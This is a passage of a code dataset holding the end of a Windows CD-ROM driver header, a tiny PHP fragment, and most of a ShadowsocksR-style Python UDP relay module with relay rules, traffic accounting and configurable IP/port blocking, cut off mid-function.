0x02\n#define IOCTL_CDROM_TRACK_ISRC 0x03\n\ntypedef struct _CDROM_SUB_Q_DATA_FORMAT {\n UCHAR Format;\n UCHAR Track;\n} CDROM_SUB_Q_DATA_FORMAT, *PCDROM_SUB_Q_DATA_FORMAT;\n\ntypedef struct _CDROM_TOC {\n UCHAR Length[2];\n UCHAR FirstTrack;\n UCHAR LastTrack;\n TRACK_DATA TrackData[MAXIMUM_NUMBER_TRACKS];\n} CDROM_TOC, *PCDROM_TOC;\n\n#define CDROM_TOC_SIZE sizeof(CDROM_TOC)\n\ntypedef struct _CDROM_TOC_SESSION_DATA {\n UCHAR Length[2];\n UCHAR FirstCompleteSession;\n UCHAR LastCompleteSession;\n TRACK_DATA TrackData[1];\n} CDROM_TOC_SESSION_DATA, *PCDROM_TOC_SESSION_DATA;\n\ntypedef struct _CDROM_TOC_ATIP_DATA_BLOCK {\n UCHAR CdrwReferenceSpeed : 3;\n UCHAR Reserved3 : 1;\n UCHAR WritePower : 3;\n UCHAR True1 : 1;\n UCHAR Reserved4 : 6;\n UCHAR UnrestrictedUse : 1;\n UCHAR Reserved5 : 1;\n UCHAR A3Valid : 1;\n UCHAR A2Valid : 1;\n UCHAR A1Valid : 1;\n UCHAR Reserved6 : 3;\n UCHAR IsCdrw : 1;\n UCHAR True2 : 1;\n UCHAR Reserved7;\n UCHAR LeadInMsf[3];\n UCHAR Reserved8;\n UCHAR LeadOutMsf[3];\n UCHAR Reserved9;\n UCHAR A1Values[3];\n UCHAR Reserved10;\n UCHAR A2Values[3];\n UCHAR Reserved11;\n UCHAR A3Values[3];\n UCHAR Reserved12;\n} CDROM_TOC_ATIP_DATA_BLOCK, *PCDROM_TOC_ATIP_DATA_BLOCK;\n\ntypedef struct _CDROM_TOC_ATIP_DATA {\n UCHAR Length[2];\n UCHAR Reserved1;\n UCHAR Reserved2;\n CDROM_TOC_ATIP_DATA_BLOCK Descriptors[0];\n} CDROM_TOC_ATIP_DATA, *PCDROM_TOC_ATIP_DATA;\n\n/* CDROM_TOC_CD_TEXT_DATA_BLOCK.PackType constants */\n#define CDROM_CD_TEXT_PACK_ALBUM_NAME 0x80\n#define CDROM_CD_TEXT_PACK_PERFORMER 0x81\n#define CDROM_CD_TEXT_PACK_SONGWRITER 0x82\n#define CDROM_CD_TEXT_PACK_COMPOSER 0x83\n#define CDROM_CD_TEXT_PACK_ARRANGER 0x84\n#define CDROM_CD_TEXT_PACK_MESSAGES 0x85\n#define CDROM_CD_TEXT_PACK_DISC_ID 0x86\n#define CDROM_CD_TEXT_PACK_GENRE 0x87\n#define CDROM_CD_TEXT_PACK_TOC_INFO 0x88\n#define CDROM_CD_TEXT_PACK_TOC_INFO2 0x89\n#define CDROM_CD_TEXT_PACK_UPC_EAN 0x8e\n#define CDROM_CD_TEXT_PACK_SIZE_INFO 0x8f\n\ntypedef struct _CDROM_TOC_CD_TEXT_DATA_BLOCK {\n UCHAR PackType;\n UCHAR TrackNumber : 7;\n UCHAR ExtensionFlag : 1;\n UCHAR SequenceNumber;\n UCHAR CharacterPosition : 4;\n UCHAR BlockNumber : 3;\n UCHAR Unicode : 1;\n _ANONYMOUS_UNION union {\n UCHAR Text[12];\n WCHAR WText[6];\n } DUMMYUNIONNAME;\n UCHAR CRC[2];\n} CDROM_TOC_CD_TEXT_DATA_BLOCK, *PCDROM_TOC_CD_TEXT_DATA_BLOCK;\n\ntypedef struct _CDROM_TOC_CD_TEXT_DATA {\n UCHAR Length[2];\n UCHAR Reserved1;\n UCHAR Reserved2;\n CDROM_TOC_CD_TEXT_DATA_BLOCK Descriptors[0];\n} CDROM_TOC_CD_TEXT_DATA, *PCDROM_TOC_CD_TEXT_DATA;\n\n/* CDROM_TOC_FULL_TOC_DATA_BLOCK.Adr constants */\n#define ADR_NO_MODE_INFORMATION 0x0\n#define ADR_ENCODES_CURRENT_POSITION 0x1\n#define ADR_ENCODES_MEDIA_CATALOG 0x2\n#define ADR_ENCODES_ISRC 0x3\n\ntypedef struct _CDROM_TOC_FULL_TOC_DATA_BLOCK {\n UCHAR SessionNumber;\n UCHAR Control : 4;\n UCHAR Adr : 4;\n UCHAR Reserved1;\n UCHAR Point;\n UCHAR MsfExtra[3];\n UCHAR Zero;\n UCHAR Msf[3];\n} CDROM_TOC_FULL_TOC_DATA_BLOCK, *PCDROM_TOC_FULL_TOC_DATA_BLOCK;\n\ntypedef struct _CDROM_TOC_FULL_TOC_DATA {\n UCHAR Length[2];\n UCHAR FirstCompleteSession;\n UCHAR LastCompleteSession;\n CDROM_TOC_FULL_TOC_DATA_BLOCK Descriptors[0];\n} CDROM_TOC_FULL_TOC_DATA, *PCDROM_TOC_FULL_TOC_DATA;\n\ntypedef struct _CDROM_TOC_PMA_DATA {\n UCHAR Length[2];\n UCHAR Reserved1;\n UCHAR Reserved2;\n CDROM_TOC_FULL_TOC_DATA_BLOCK Descriptors[0];\n} CDROM_TOC_PMA_DATA, *PCDROM_TOC_PMA_DATA;\n\n/* SUB_Q_HEADER.AudioStatus constants */\n#define AUDIO_STATUS_NOT_SUPPORTED 0x00\n#define AUDIO_STATUS_IN_PROGRESS 0x11\n#define AUDIO_STATUS_PAUSED 0x12\n#define AUDIO_STATUS_PLAY_COMPLETE 0x13\n#define AUDIO_STATUS_PLAY_ERROR 0x14\n#define AUDIO_STATUS_NO_STATUS 0x15\n\ntypedef struct _SUB_Q_HEADER {\n UCHAR Reserved;\n UCHAR AudioStatus;\n UCHAR DataLength[2];\n} SUB_Q_HEADER, *PSUB_Q_HEADER;\n\ntypedef struct _SUB_Q_MEDIA_CATALOG_NUMBER {\n SUB_Q_HEADER Header;\n UCHAR FormatCode;\n UCHAR Reserved[3];\n UCHAR Reserved1 : 7;\n UCHAR Mcval :1;\n UCHAR MediaCatalog[15];\n} SUB_Q_MEDIA_CATALOG_NUMBER, *PSUB_Q_MEDIA_CATALOG_NUMBER;\n\ntypedef struct _SUB_Q_TRACK_ISRC {\n SUB_Q_HEADER Header;\n UCHAR FormatCode;\n UCHAR Reserved0;\n UCHAR Track;\n UCHAR Reserved1;\n UCHAR Reserved2 : 7;\n UCHAR Tcval : 1;\n UCHAR TrackIsrc[15];\n} SUB_Q_TRACK_ISRC, *PSUB_Q_TRACK_ISRC;\n\ntypedef struct _SUB_Q_CURRENT_POSITION {\n SUB_Q_HEADER Header;\n UCHAR FormatCode;\n UCHAR Control : 4;\n UCHAR ADR : 4;\n UCHAR TrackNumber;\n UCHAR IndexNumber;\n UCHAR AbsoluteAddress[4];\n UCHAR TrackRelativeAddress[4];\n} SUB_Q_CURRENT_POSITION, *PSUB_Q_CURRENT_POSITION;\n\ntypedef union _SUB_Q_CHANNEL_DATA {\n SUB_Q_CURRENT_POSITION CurrentPosition;\n SUB_Q_MEDIA_CATALOG_NUMBER MediaCatalog;\n SUB_Q_TRACK_ISRC TrackIsrc;\n} SUB_Q_CHANNEL_DATA, *PSUB_Q_CHANNEL_DATA;\n\n/* CDROM_AUDIO_CONTROL.LbaFormat constants */\n#define AUDIO_WITH_PREEMPHASIS 0x1\n#define DIGITAL_COPY_PERMITTED 0x2\n#define AUDIO_DATA_TRACK 0x4\n#define TWO_FOUR_CHANNEL_AUDIO 0x8\n\ntypedef struct _CDROM_AUDIO_CONTROL {\n\tUCHAR LbaFormat;\n\tUSHORT LogicalBlocksPerSecond;\n} CDROM_AUDIO_CONTROL, *PCDROM_AUDIO_CONTROL;\n\ntypedef struct _VOLUME_CONTROL {\n UCHAR PortVolume[4];\n} VOLUME_CONTROL, *PVOLUME_CONTROL;\n\ntypedef enum _TRACK_MODE_TYPE {\n\tYellowMode2,\n\tXAForm2,\n\tCDDA\n} TRACK_MODE_TYPE, *PTRACK_MODE_TYPE;\n\ntypedef struct __RAW_READ_INFO {\n\tLARGE_INTEGER DiskOffset;\n\tULONG SectorCount;\n\tTRACK_MODE_TYPE TrackMode;\n} RAW_READ_INFO, *PRAW_READ_INFO;\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* _NTDDCDRM_ */\n"} {"text": "method;\n return $this->object->$sMethod($sValue, $this->params);\n }\n}\n\n// EOF"} {"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2015 clowwindy\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n# SOCKS5 UDP Request\n# +----+------+------+----------+----------+----------+\n# |RSV | FRAG | ATYP | DST.ADDR | DST.PORT | DATA |\n# +----+------+------+----------+----------+----------+\n# | 2 | 1 | 1 | Variable | 2 | Variable |\n# +----+------+------+----------+----------+----------+\n\n# SOCKS5 UDP Response\n# +----+------+------+----------+----------+----------+\n# |RSV | FRAG | ATYP | DST.ADDR | DST.PORT | DATA |\n# +----+------+------+----------+----------+----------+\n# | 2 | 1 | 1 | Variable | 2 | Variable |\n# +----+------+------+----------+----------+----------+\n\n# shadowsocks UDP Request (before encrypted)\n# +------+----------+----------+----------+\n# | ATYP | DST.ADDR | DST.PORT | DATA |\n# +------+----------+----------+----------+\n# | 1 | Variable | 2 | Variable |\n# +------+----------+----------+----------+\n\n# shadowsocks UDP Response (before encrypted)\n# +------+----------+----------+----------+\n# | ATYP | DST.ADDR | DST.PORT | DATA |\n# +------+----------+----------+----------+\n# | 1 | Variable | 2 | Variable |\n# +------+----------+----------+----------+\n\n# shadowsocks UDP Request and Response (after encrypted)\n# +-------+--------------+\n# | IV | PAYLOAD |\n# +-------+--------------+\n# | Fixed | Variable |\n# +-------+--------------+\n\n# HOW TO NAME THINGS\n# ------------------\n# `dest` means destination server, which is from DST fields in the SOCKS5\n# request\n# `local` means local server of shadowsocks\n# `remote` means remote server of shadowsocks\n# `client` means UDP clients that connects to other servers\n# `server` means the UDP server that handles user requests\n\nfrom __future__ import absolute_import, division, print_function, \\\n with_statement\n\nimport time\nimport socket\nimport logging\nimport struct\nimport errno\nimport random\nimport binascii\nimport traceback\n\nfrom shadowsocks import encrypt, obfs, eventloop, lru_cache, common, shell\nfrom shadowsocks.common import pre_parse_header, parse_header, pack_addr, IPNetwork, PortRange\n\n# for each handler, we have 2 stream directions:\n# upstream: from client to server direction\n# read local and write to remote\n# downstream: from server to client direction\n# read remote and write to local\n\nSTREAM_UP = 0\nSTREAM_DOWN = 1\n\n# for each stream, it's waiting for reading, or writing, or both\nWAIT_STATUS_INIT = 0\nWAIT_STATUS_READING = 1\nWAIT_STATUS_WRITING = 2\nWAIT_STATUS_READWRITING = WAIT_STATUS_READING | WAIT_STATUS_WRITING\n\nBUF_SIZE = 65536\nDOUBLE_SEND_BEG_IDS = 16\nPOST_MTU_MIN = 500\nPOST_MTU_MAX = 1400\nSENDING_WINDOW_SIZE = 8192\n\nSTAGE_INIT = 0\nSTAGE_RSP_ID = 1\nSTAGE_DNS = 2\nSTAGE_CONNECTING = 3\nSTAGE_STREAM = 4\nSTAGE_DESTROYED = -1\n\nCMD_CONNECT = 0\nCMD_RSP_CONNECT = 1\nCMD_CONNECT_REMOTE = 2\nCMD_RSP_CONNECT_REMOTE = 3\nCMD_POST = 4\nCMD_SYN_STATUS = 5\nCMD_POST_64 = 6\nCMD_SYN_STATUS_64 = 7\nCMD_DISCONNECT = 8\n\nCMD_VER_STR = b\"\\x08\"\n\nRSP_STATE_EMPTY = b\"\"\nRSP_STATE_REJECT = b\"\\x00\"\nRSP_STATE_CONNECTED = b\"\\x01\"\nRSP_STATE_CONNECTEDREMOTE = b\"\\x02\"\nRSP_STATE_ERROR = b\"\\x03\"\nRSP_STATE_DISCONNECT = b\"\\x04\"\nRSP_STATE_REDIRECT = b\"\\x05\"\n\ndef client_key(source_addr, server_af):\n # notice this is server af, not dest af\n return '%s:%s:%d' % (source_addr[0], source_addr[1], server_af)\n\nclass UDPRelay(object):\n\n def __init__(\n self,\n config,\n dns_resolver,\n is_local,\n stat_callback=None,\n stat_counter=None):\n self._config = config\n if config.get('connect_verbose_info', 0) > 0:\n common.connect_log = logging.info\n\n if config.get('connect_hex_data', 0) > 0:\n self._connect_hex_data = True\n else:\n self._connect_hex_data = False\n\n if is_local:\n self._listen_addr = config['local_address']\n self._listen_port = config['local_port']\n self._remote_addr = config['server']\n self._remote_port = config['server_port']\n else:\n self._listen_addr = config['server']\n self._listen_port = config['server_port']\n self._remote_addr = None\n self._remote_port = None\n self._dns_resolver = dns_resolver\n self._password = common.to_bytes(config['password'])\n self._method = config['method']\n self._timeout = config['timeout']\n self._is_local = is_local\n self._udp_cache_size = config['udp_cache']\n self._cache = lru_cache.LRUCache(\n timeout=config['udp_timeout'],\n close_callback=self._close_client_pair)\n self._cache_dns_client = lru_cache.LRUCache(\n timeout=10, close_callback=self._close_client_pair)\n self._client_fd_to_server_addr = {}\n #self._dns_cache = lru_cache.LRUCache(timeout=1800)\n self._eventloop = None\n self._closed = False\n self.server_transfer_ul = 0\n self.server_transfer_dl = 0\n\n self.connected_iplist = []\n self.wrong_iplist = {}\n self.detect_log_list = []\n\n self.is_cleaning_connected_iplist = False\n self.is_cleaning_wrong_iplist = False\n self.is_cleaning_detect_log = False\n self.is_cleaning_mu_detect_log_list = False\n self.is_cleaning_mu_connected_iplist = False\n\n if 'users_table' in self._config:\n self.multi_user_table = self._config['users_table']\n\n self.mu_server_transfer_ul = {}\n self.mu_server_transfer_dl = {}\n self.mu_connected_iplist = {}\n self.mu_detect_log_list = {}\n\n self.is_pushing_detect_hex_list = False\n self.is_pushing_detect_text_list = False\n self.detect_hex_list = self._config['detect_hex_list'].copy()\n self.detect_text_list = self._config['detect_text_list'].copy()\n\n self.protocol_data = obfs.obfs(config['protocol']).init_data()\n self._protocol = obfs.obfs(config['protocol'])\n server_info = obfs.server_info(self.protocol_data)\n server_info.host = self._listen_addr\n server_info.port = self._listen_port\n if 'users_table' in self._config:\n server_info.users = self.multi_user_table\n else:\n server_info.users = {}\n server_info.is_multi_user = config[\"is_multi_user\"]\n server_info.protocol_param = config['protocol_param']\n server_info.obfs_param = ''\n server_info.iv = b''\n server_info.recv_iv = b''\n server_info.key_str = common.to_bytes(config['password'])\n try:\n server_info.key = encrypt.encrypt_key(self._password, self._method)\n except Exception:\n logging.error(\"UDP: method not support\")\n server_info.key = b''\n server_info.head_len = 30\n server_info.tcp_mss = 1452\n server_info.buffer_size = BUF_SIZE\n server_info.overhead = 0\n self._protocol.set_server_info(server_info)\n\n self._sockets = set()\n self._fd_to_handlers = {}\n self._reqid_to_hd = {}\n self._data_to_write_to_server_socket = []\n\n self._timeouts = [] # a list for all the handlers\n # we trim the timeouts once a while\n self._timeout_offset = 0 # last checked position for timeout\n self._handler_to_timeouts = {} # key: handler value: index in timeouts\n\n self._bind = config.get('out_bind', '')\n self._bindv6 = config.get('out_bindv6', '')\n self._ignore_bind_list = config.get('ignore_bind', [])\n\n if 'forbidden_ip' in config:\n self._forbidden_iplist = IPNetwork(config['forbidden_ip'])\n else:\n self._forbidden_iplist = None\n if 'forbidden_port' in config:\n self._forbidden_portset = PortRange(config['forbidden_port'])\n else:\n self._forbidden_portset = None\n if 'disconnect_ip' in config:\n self._disconnect_ipset = IPNetwork(config['disconnect_ip'])\n else:\n self._disconnect_ipset = None\n\n self._relay_rules = self._config['relay_rules'].copy()\n self._is_pushing_relay_rules = False\n\n addrs = socket.getaddrinfo(self._listen_addr, self._listen_port, 0,\n socket.SOCK_DGRAM, socket.SOL_UDP)\n if len(addrs) == 0:\n raise Exception(\"can't get addrinfo for %s:%d\" %\n (self._listen_addr, self._listen_port))\n af, socktype, proto, canonname, sa = addrs[0]\n server_socket = socket.socket(af, socktype, proto)\n server_socket.bind((self._listen_addr, self._listen_port))\n server_socket.setblocking(False)\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 1024)\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024 * 1024)\n self._server_socket = server_socket\n self._stat_callback = stat_callback\n\n def _get_a_server(self):\n server = self._config['server']\n server_port = self._config['server_port']\n if isinstance(server_port, list):\n server_port = random.choice(server_port)\n if isinstance(server, list):\n server = random.choice(server)\n logging.debug('chosen server: %s:%d', server, server_port)\n return server, server_port\n\n def add_transfer_u(self, user, transfer):\n if ((user is None or user == 0) and self._config[\"is_multi_user\"] != 0) or self._config[\"is_multi_user\"] == 0:\n self.server_transfer_ul += transfer\n else:\n if user not in self.mu_server_transfer_ul:\n self.mu_server_transfer_ul[user] = 0\n self.mu_server_transfer_ul[\n user] += transfer + self.server_transfer_ul\n self.server_transfer_ul = 0\n\n def add_transfer_d(self, user, transfer):\n if ((user is None or user == 0) and self._config[\"is_multi_user\"] != 0) or self._config[\"is_multi_user\"] == 0:\n self.server_transfer_dl += transfer\n else:\n if user not in self.mu_server_transfer_dl:\n self.mu_server_transfer_dl[user] = 0\n self.mu_server_transfer_dl[\n user] += transfer + self.server_transfer_dl\n self.server_transfer_dl = 0\n\n def _close_client_pair(self, client_pair):\n client, uid = client_pair\n self._close_client(client)\n\n def _close_client(self, client):\n if hasattr(client, 'close'):\n if not self._is_local:\n if client.fileno() in self._client_fd_to_server_addr:\n logging.debug(\n 'close_client: %s' %\n (self._client_fd_to_server_addr[\n client.fileno()],))\n else:\n client.info('close_client')\n self._sockets.remove(client.fileno())\n self._eventloop.remove(client)\n del self._client_fd_to_server_addr[client.fileno()]\n client.close()\n else:\n # just an address\n client.info('close_client pass %s' % client)\n pass\n\n def _pre_parse_udp_header(self, data):\n if data is None:\n return\n datatype = common.ord(data[0])\n if datatype == 0x8:\n if len(data) >= 8:\n crc = binascii.crc32(data) & 0xffffffff\n if crc != 0xffffffff:\n logging.warn('uncorrect CRC32, maybe wrong password or '\n 'encryption method')\n return None\n cmd = common.ord(data[1])\n request_id = struct.unpack('>H', data[2:4])[0]\n data = data[4:-4]\n return (cmd, request_id, data)\n elif len(data) >= 6 and common.ord(data[1]) == 0x0:\n crc = binascii.crc32(data) & 0xffffffff\n if crc != 0xffffffff:\n logging.warn('uncorrect CRC32, maybe wrong password or '\n 'encryption method')\n return None\n cmd = common.ord(data[1])\n data = data[2:-4]\n return (cmd, 0, data)\n else:\n logging.warn('header too short, maybe wrong password or '\n 'encryption method')\n return None\n return data\n\n def _pack_rsp_data(self, cmd, request_id, data):\n _rand_data = b\"123456789abcdefghijklmnopqrstuvwxyz\" * 2\n reqid_str = struct.pack(\">H\", request_id)\n return b''.join([CMD_VER_STR, common.chr(cmd), reqid_str, data, _rand_data[\n :random.randint(0, len(_rand_data))], reqid_str])\n\n def _handel_protocol_error(self, client_address, ogn_data):\n #raise Exception('can not parse header')\n logging.warn(\n \"Protocol ERROR, UDP ogn data %s from %s:%d\" %\n (binascii.hexlify(ogn_data), client_address[0], client_address[1]))\n if client_address[0] not in self.wrong_iplist and client_address[\n 0] != 0 and self.is_cleaning_wrong_iplist == False:\n self.wrong_iplist[client_address[0]] = time.time()\n\n def _get_relay_host(self, client_address, ogn_data):\n for id in self._relay_rules:\n if self._relay_rules[id]['port'] == 0:\n port = self._listen_port\n else:\n port = self._relay_rules[id]['port']\n return (self._relay_rules[id]['dist_ip'], int(port))\n return (None, None)\n\n def _handel_normal_relay(self, client_address, ogn_data):\n host, port = self._get_relay_host(client_address, ogn_data)\n self._encrypt_correct = False\n if port is None:\n raise Exception('can not parse header')\n data = b\"\\x03\" + common.to_bytes(common.chr(len(host))) + \\\n common.to_bytes(host) + struct.pack('>H', port)\n return (data + ogn_data, True)\n\n def _get_mu_relay_host(self, ogn_data, uid):\n\n if not uid:\n return (None, None)\n\n for id in self._relay_rules:\n if (self._relay_rules[id]['user_id'] == 0 and uid !=\n 0) or self._relay_rules[id]['user_id'] == uid:\n has_higher_priority = False\n for priority_id in self._relay_rules:\n if (\n (\n self._relay_rules[priority_id]['priority'] > self._relay_rules[id]['priority'] and self._relay_rules[id]['id'] != self._relay_rules[priority_id]['id']) or (\n self._relay_rules[priority_id]['priority'] == self._relay_rules[id]['priority'] and self._relay_rules[id]['id'] > self._relay_rules[priority_id]['id'])) and (\n self._relay_rules[priority_id]['user_id'] == uid or self._relay_rules[priority_id]['user_id'] == 0):\n has_higher_priority = True\n continue\n\n if has_higher_priority:\n continue\n\t\t\t\t\t\n if self._relay_rules[id]['dist_ip'] == '0.0.0.0':\n continue\n\n if self._relay_rules[id]['port'] == 0:\n port = self._listen_port\n else:\n port = self._relay_rules[id]['port']\n\n return (self._relay_rules[id]['dist_ip'], int(port))\n return (None, None)\n\n def _handel_mu_relay(self, client_address, ogn_data, uid):\n host, port = self._get_mu_relay_host(ogn_data, uid)\n if host is None:\n return (ogn_data, False)\n self._encrypt_correct = False\n if port is None:\n raise Exception('can not parse header')\n data = b\"\\x03\" + common.to_bytes(common.chr(len(host))) + \\\n common.to_bytes(host) + struct.pack('>H', port)\n return (data + ogn_data, True)\n\n def _is_relay(self, client_address, ogn_data, uid):\n if self._config['is_multi_user'] == 0:\n if self._get_relay_host(client_address, ogn_data) == (None, None):\n return False\n else:\n if self._get_mu_relay_host(ogn_data, uid) == (None, None):\n return False\n return True\n\n def _socket_bind_addr(self, sock, af, is_relay):\n bind_addr = ''\n if self._bind and af == socket.AF_INET:\n bind_addr = self._bind\n elif self._bindv6 and af == socket.AF_INET6:\n bind_addr = self._bindv6\n\n # bind_addr = bind_addr.replace(\"::ffff:\", \"\")\n # if bind_addr in self._ignore_bind_list:\n # bind_addr = None\n\n if is_relay:\n bind_addr = None\n\n if bind_addr:\n local_addrs = socket.getaddrinfo(\n bind_addr, 0, 0, socket.SOCK_STREAM, socket.SOL_TCP)\n if local_addrs[0][0] == af:\n logging.debug(\"bind %s\" % (bind_addr,))\n sock.bind((bind_addr, 0))\n\n def _handle_server(self):\n server = self._server_socket\n data, r_addr = server.recvfrom(BUF_SIZE)\n ogn_data = data\n if not data:\n logging.debug('UDP handle_server: data is empty')\n if self._stat_callback:\n self._stat_callback(self._listen_port, len(data))\n uid = None\n if self._is_local:\n frag = common.ord(data[2])\n if frag != 0:\n logging.warn('drop a message since frag is not 0')\n return\n else:\n data = data[3:]\n else:\n try:\n data, key, ref_iv = encrypt.decrypt_all(self._password,\n self._method,\n data)\n except Exception:\n logging.debug('UDP handle_server: decrypt data failed')\n return\n\n # decrypt data\n if not data:\n logging.debug('UDP handle_server: data is empty after decrypt')\n return\n ref_iv = [0]\n self._protocol.obfs.server_info.recv_iv = ref_iv[0]\n data, uid = self._protocol.server_udp_post_decrypt(data)\n\n if self._config['is_multi_user'] != 0 and data:\n if uid:\n if uid not in self.mu_server_transfer_ul:\n self.mu_server_transfer_ul[uid] = 0\n if uid not in self.mu_server_transfer_dl:\n self.mu_server_transfer_dl[uid] = 0\n if uid not in self.mu_connected_iplist:\n self.mu_connected_iplist[uid] = []\n if uid not in self.mu_detect_log_list:\n self.mu_detect_log_list[uid] = []\n\n if common.getRealIp(r_addr[0]) not in self.mu_connected_iplist[uid]:\n self.mu_connected_iplist[uid].append(common.getRealIp(r_addr[0]))\n\n else:\n raise Exception(\n 'This port is multi user in single port only,so The connection has been rejected, when connect from %s:%d via port %d' %\n (r_addr[0], r_addr[1], self._listen_port))\n\n is_relay = False\n\n #logging.info(\"UDP data %s\" % (binascii.hexlify(data),))\n if not self._is_local:\n\n if not self._is_relay(r_addr, ogn_data, uid):\n data = pre_parse_header(data)\n\n data = self._pre_parse_udp_header(data)\n if data is None:\n return\n\n if isinstance(data, tuple):\n return\n # return self._handle_tcp_over_udp(data, r_addr)\n else:\n if self._config[\"is_multi_user\"] == 0:\n data, is_relay = self._handel_normal_relay(r_addr, ogn_data)\n else:\n data, is_relay = self._handel_mu_relay(r_addr, ogn_data, uid)\n\n try:\n header_result = parse_header(data)\n except:\n self._handel_protocol_error(r_addr, ogn_data)\n return\n\n if header_result is None:\n self._handel_protocol_error(r_addr, ogn_data)\n return\n connecttype, addrtype, dest_addr, dest_port, header_length = header_result\n\n if self._is_local:\n addrtype = 3\n server_addr, server_port = self._get_a_server()\n else:\n server_addr, server_port = dest_addr, dest_port\n\n if (addrtype & 7) == 3:\n af = common.is_ip(server_addr)\n if af == False:\n handler = common.UDPAsyncDNSHandler((data, r_addr, uid, header_length, is_relay))\n handler.resolve(self._dns_resolver, (server_addr, server_port), self._handle_server_dns_resolved)\n else:\n self._handle_server_dns_resolved(\"\", (server_addr, server_port), server_addr, (data, r_addr, uid, header_length, is_relay))\n else:\n self._handle_server_dns_resolved(\"\", (server_addr, server_port), server_addr, (data, r_addr, uid, header_length, is_relay))\n\n def _handle_server_dns_resolved(self, error, remote_addr, server_addr, params):\n if error:\n return\n data, r_addr, uid, header_length, is_relay = params\n if uid is None:\n is_mu = False\n user_id = self._listen_port\n else:\n is_mu = True\n user_id = uid\n try:\n server_port = remote_addr[1]\n addrs = socket.getaddrinfo(server_addr, server_port, 0,\n socket.SOCK_DGRAM, socket.SOL_UDP)\n if not addrs: # drop\n return\n af, socktype, proto, canonname, sa = addrs[0]\n server_addr = sa[0]\n key = client_key(r_addr, af)\n client_pair = self._cache.get(key, None)\n if client_pair is None:\n client_pair = self._cache_dns_client.get(key, None)\n if client_pair is None:\n if self._forbidden_iplist:\n if common.to_str(sa[0]) in self._forbidden_iplist:\n logging.debug('IP %s is in forbidden list, drop' % common.to_str(sa[0]))\n # drop\n return\n if self._disconnect_ipset:\n if common.to_str(sa[0]) in self._disconnect_ipset:\n logging.debug('IP %s is in disconnect list, drop' % common.to_str(sa[0]))\n # drop\n return\n if self._forbidden_portset:\n if sa[1] in self._forbidden_portset:\n logging.debug('Port %d is in forbidden list, reject' % sa[1])\n # drop\n return\n\n if is_mu:\n if self.multi_user_table[uid]['_forbidden_iplist']:\n if common.to_str(sa[0]) in self.multi_user_table[uid]['_forbidden_iplist']:\n logging.debug('IP %s is in forbidden list, drop' % common.to_str(sa[0]))\n # drop\n return\n if self.multi_user_table[uid]['_disconnect_ipset']:\n if common.to_str(sa[0]) in self.multi_user_table[uid]['_disconnect_ipset']:\n logging.debug('IP %s is in disconnect list, drop' % common.to_str(sa[0]))\n # drop\n return\n if self.multi_user_table[uid]['_forbidden_portset']:\n if sa[1] in self.multi_user_table[uid]['_forbidden_portset']:\n logging.debug('Port %d is in forbidden list, reject' % sa[1])\n # drop\n return\n\n client = socket.socket(af, socktype, proto)\n client_uid = uid\n client.setblocking(False)\n self._socket_bind_addr(client, af, is_relay)\n is_dns = False\n if len(data) > header_length + 13 and data[header_length + 4 : header_length + 12] == b\"\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\":\n is_dns = True\n else:\n pass\n if sa[1] == 53 and is_dns: #DNS\n logging.debug(\"DNS query %s from %s:%d\" % (common.to_str(sa[0]), r_addr[0], r_addr[1]))\n self._cache_dns_client[key] = (client, uid)\n else:\n self._cache[key] = (client, uid)\n self._client_fd_to_server_addr[client.fileno()] = (r_addr, af)\n\n self._sockets.add(client.fileno())\n self._eventloop.add(client, eventloop.POLL_IN, self)\n\n logging.debug('UDP port %5d sockets %d' % (self._listen_port, len(self._sockets)))\n\n if not self.is_pushing_detect_text_list:\n for id in self.detect_text_list:\n if common.match_regex(\n self.detect_text_list[id]['regex'],\n str(data)):\n if self._config['is_multi_user'] != 0 and uid != 0:\n if self.is_cleaning_mu_detect_log_list == False and id not in self.mu_detect_log_list[\n uid]:\n self.mu_detect_log_list[uid].append(id)\n else:\n if self.is_cleaning_detect_log == False and id not in self.detect_log_list:\n self.detect_log_list.append(id)\n raise Exception(\n 'This connection match the regex: id:%d was reject,regex: %s ,connecting %s:%d from %s:%d via port %d' %\n (self.detect_text_list[id]['id'],\n self.detect_text_list[id]['regex'],\n common.to_str(server_addr),\n server_port,\n r_addr[0],\n r_addr[1],\n self._listen_port))\n if not self.is_pushing_detect_hex_list:\n for id in self.detect_hex_list:\n if common.match_regex(\n self.detect_hex_list[id]['regex'],\n binascii.hexlify(data)):\n if self._config['is_multi_user'] != 0 and uid != 0:\n if self.is_cleaning_mu_detect_log_list == False and id not in self.mu_detect_log_list[\n uid]:\n self.mu_detect_log_list[uid].append(id)\n else:\n if self.is_cleaning_detect_log == False and id not in self.detect_log_list:\n self.detect_log_list.append(id)\n raise Exception(\n 'This connection match the regex: id:%d was reject,regex: %s ,connecting %s:%d from %s:%d via port %d' %\n (self.detect_hex_list[id]['id'],\n self.detect_hex_list[id]['regex'],\n common.to_str(server_addr),\n server_port,\n r_addr[0],\n r_addr[1],\n self._listen_port))\n if not self._connect_hex_data:\n common.connect_log('UDP data to %s:%d from %s:%d via port %d' %\n (common.to_str(server_addr), server_port,\n r_addr[0], r_addr[1], self._listen_port))\n else:\n common.connect_log(\n 'UDP data to %s:%d from %s:%d via port %d,hex data : %s' %\n (common.to_str(server_addr),\n server_port,\n r_addr[0],\n r_addr[1],\n self._listen_port,\n binascii.hexlify(data)))\n if self._config['is_multi_user'] != 2:\n if common.to_str(r_addr[0]) in self.wrong_iplist and r_addr[\n 0] != 0 and self.is_cleaning_wrong_iplist == False:\n del self.wrong_iplist[common.to_str(r_addr[0])]\n if common.getRealIp(r_addr[0]) not in self.connected_iplist and r_addr[\n 0] != 0 and self.is_cleaning_connected_iplist == False:\n self.connected_iplist.append(common.getRealIp(r_addr[0]))\n else:\n client, client_uid = client_pair\n self._cache.clear(self._udp_cache_size)\n self._cache_dns_client.clear(16)\n\n if self._is_local:\n try:\n key, ref_iv, m = encrypt.gen_key_iv(self._password, self._method)\n 